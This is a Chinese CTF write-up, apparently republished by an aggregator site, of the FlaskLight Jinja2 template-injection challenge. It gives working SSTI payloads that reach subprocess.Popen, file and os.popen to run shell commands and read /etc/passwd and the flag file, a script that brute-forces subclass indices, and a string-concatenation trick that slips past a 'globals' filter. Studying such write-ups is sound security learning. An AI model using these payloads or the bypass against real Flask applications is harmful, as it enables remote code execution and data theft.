目录
subprocess.Popen
FILE
warnings.catch_warnings
site._Printer
这题很明显就是 SSTI了
![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤,BUUctf,服务器](https://imgs.yssmx.com/Uploads/2023/10/730076-1.png)
源代码
我们试试看
{{7*7}}
![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤,BUUctf,服务器](https://imgs.yssmx.com/Uploads/2023/10/730076-2.png)
然后我们就开始吧
原本我的想法是直接{{url_for.__globals__}}
但是回显是直接500 猜测过滤 我们正常来吧
{{"".__class__}} 查看当前情况
{{"".__class__.__base__}} 查看基类 这里发现没有利用的 我们修改代码
{{"".__class__.__mro__}} 查看全部类 发现存在<type 'object'>了
{{"".__class__.__mro__[2].__subclasses__()}} 查看object的子类![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤,BUUctf,服务器](https://imgs.yssmx.com/Uploads/2023/10/730076-3.png)
这里我们需要 os 来调用
但是这里存在一个类 可以不需要os
subprocess.Popen
Python3 subprocess | 菜鸟教程
需要参数
("命令",shell=True,stdout=-1)
这里 stdout 就是指定输出 PIPE然后我们可以使用 其方法来进行交互
("命令",shell=True,stdout=-1).communicate()这样我们就可以实现rce
首先通过 脚本跑出来其的位数
import time
import requests
base_url="http://1a3ad76d-35d3-4a35-97fb-8997c87bf989.node4.buuoj.cn:81/?search="
for i in range(300):
payload="{{\"\".__class__.__mro__[2].__subclasses__()[%s]}}"%i
r = requests.get(url=base_url + payload)
if "subprocess.Popen" in r.text:
print(i)
if r.status_code == 429:
time.sleep(0.5)跑出来是258
我们开始构造
?search={{''.__class__.__mro__[2].__subclasses__()[258]("ls",shell=True,stdout=-1).communicate()[0].strip()}}
最后的.communicate()[0].strip() 通过 communicate方法 输出 并且指定数组 去除空白符![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤,BUUctf,服务器](https://imgs.yssmx.com/Uploads/2023/10/730076-4.png)
我们看看 flasklight看看
?search={{''.__class__.__mro__[2].__subclasses__()[258]("cat /flasklight/coomme_geeeett_youur_flek",shell=True,stdout=-1).communicate()[0].strip()}}FILE
这是另一个方法 通过file读取文件
首先我们要测试一下
先查找一下 file
![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤,BUUctf,服务器](https://imgs.yssmx.com/Uploads/2023/10/730076-5.png)
发现是40
然后我们看看
{{"".__class__.__mro__[2].__subclasses__()[40]}}/?search={{"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()}}![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤,BUUctf,服务器](https://imgs.yssmx.com/Uploads/2023/10/730076-6.png)
读取成功
然后我们去读一下命令行吧
![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤,BUUctf,服务器](https://imgs.yssmx.com/Uploads/2023/10/730076-7.png)
发现读出了路径
我们看看这个py
![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤,BUUctf,服务器](https://imgs.yssmx.com/Uploads/2023/10/730076-8.png)
但是还是没有办法直接读取出来 因为不知道flag的文件名字
warnings.catch_warnings
我们首先找一下这个类的位数
59
{{"".__class__.__mro__[2].__subclasses__()[59].__init__}}这里就卡住了 因为我们还是需要 globals的参与
我们如何绕过过滤呢
{{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']}}这样就可以
我们在上面也知道 是通过匹配过滤的
做到这个我们其实就可以正常rce了 但是还是完善一下这个类的用法吧
![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤,BUUctf,服务器](https://imgs.yssmx.com/Uploads/2023/10/730076-9.png)
这里我们能发现 这个类没有加载 os 需要我们手动加载
我们需要在其
['__builtins__']['eval']下导入
payload
?search={{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}这样就借助 os 实现了 rce
site._Printer
我们知道了 globals可以拼接绕过
这个方法也可以实现我们看看里面是否内置了 os
?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']}}![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤,BUUctf,服务器](https://imgs.yssmx.com/Uploads/2023/10/730076-10.png)
发现存在 我们直接rce即可
?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}![[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤,BUUctf,服务器](https://imgs.yssmx.com/Uploads/2023/10/730076-11.png)
文章来源:https://www.toymoban.com/news/detail-730076.html
最后读取即可文章来源地址https://www.toymoban.com/news/detail-730076.html
到了这里,关于[CSCCTF 2019 Qual]FlaskLight 过滤 url_for globals 绕过globals过滤的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![[论文阅读笔记23]Adaptive Sparse Convolutional Networks with Global Context Enhancement for ... on drone](https://imgs.yssmx.com/Uploads/2024/02/763326-1.png)
